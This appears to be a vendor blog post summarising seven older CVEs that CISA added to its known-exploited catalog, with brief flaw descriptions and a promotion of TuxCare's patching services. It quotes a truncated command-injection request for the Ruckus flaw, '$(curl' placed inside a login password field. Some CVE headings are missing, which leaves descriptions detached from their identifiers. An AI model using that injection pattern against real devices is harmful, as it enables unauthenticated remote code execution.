Seven Known Exploited Vulnerabilities Added to CISA Catalog
CISA (Cybersecurity and Infrastructure Security Agency) added seven new Linux vulnerabilities to its known exploited vulnerabilities (KEV) catalog on May 12, 2023.
These include Ruckus AP remote code execution (CVE-2023-25717), Red Hat privilege escalation (CVE-2021-3560), Linux kernel privilege escalations (CVE-2014-0196 and CVE-2010-3904), Jenkins UI information disclosure (CVE-2015-5317), Apache Tomcat remote code execution (CVE-2016-8735), and an Oracle Java SE and JRockit issue (CVE-2016-3427).
The Ruckus product vulnerability has been exploited by the AndoryuBot DDoS botnet. But, there are no public reports of exploitation for other vulnerabilities. However, technical details and proof-of-concept (PoC) exploits are available, given that some of them have been known for a decade.
Seven Known Exploited Vulnerabilities
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl
substring.
This flaw enables an unprivileged local attacker to create a new local administrator or carry out similar actions. The main risks posed by this vulnerability are compromised data confidentiality and integrity, as well as potential systems vulnerability.
This flaw enables local users to exploit a race condition involving lengthy strings during read and write operations. As a result, attackers can either cause a denial of service (memory corruption and system crash) or potentially gain escalated privileges.
In the Linux kernel prior to version 2.6.36, the rds_page_copy_user
function in net/rds/page.c
, which handles the Reliable Datagram Sockets (RDS) protocol, lacks proper validation of addresses obtained from user space. This vulnerability enables local users to gain escalated privileges as the sendmsg and recvmsg system calls can be exploited with crafted usage.
In Jenkins versions prior to 1.638 and LTS versions prior to 1.625.2, the Fingerprints pages have a vulnerability that could potentially enable remote attackers to access sensitive jobs and build name information by directly requesting it.
This flaw arises from the failure to update the listener to align with the CVE-2016-3427 Oracle patch, which impacted credential types and caused inconsistencies.
A flaw has been found in Oracle Java SE versions 6u113, 7u99, and 8u77, Java SE Embedded 8u77, and JRockit R28.3.9. The vulnerability is related to JMX (Java Management Extensions) and can be exploited remotely by attackers.
Solutions for Those Exploited Vulnerabilities
Organizations often need to use Linux distributions after the manufacturer ends security support – but cybercriminals continue to look for and exploit vulnerabilities after these products reach the end of life (EOL).
Fortunately, TuxCare offers a solution in the form of Extended Lifecycle Support. With this service, organizations can confidently continue using these systems for an additional period of up to four years beyond the official end-of-life date. During this extended timeframe, TuxCare takes on the responsibility of providing automated vulnerability patches.
Moreover, TuxCare offers a live patching service for more than 40+ Linux distros, including some popular ones like CentOS, AlmaLinux, Debian, Ubuntu, Oracle Linux, Amazon Linux, CloudLinux, Red Hat, Rocky Linux, and Raspberry Pi OS.
Conclusion
Above vulnerabilities share a common link to Linux, suggesting that they may have been exploited in attacks targeting Linux systems. NIST advisories for each vulnerability reference advisories from Linux distributions, which describe the impact of these flaws and provide patch availability.
It’s likely that some of these issues have also been exploited in attacks targeting Android devices, as the exploitation of Linux kernel vulnerabilities in Android attacks is not uncommon.
CISA has identified a connection between two of the vulnerabilities. The presence of the Apache Tomcat flaw is attributed to a component that was not updated to incorporate Oracle’s fix for CVE-2016-3427. However, it’s not evident though, whether multiple flaws have been combined together or used in a single attack, or if the vulnerabilities have been exploited by the same threat actor.
The sources for this article include a story from SecurityWeek.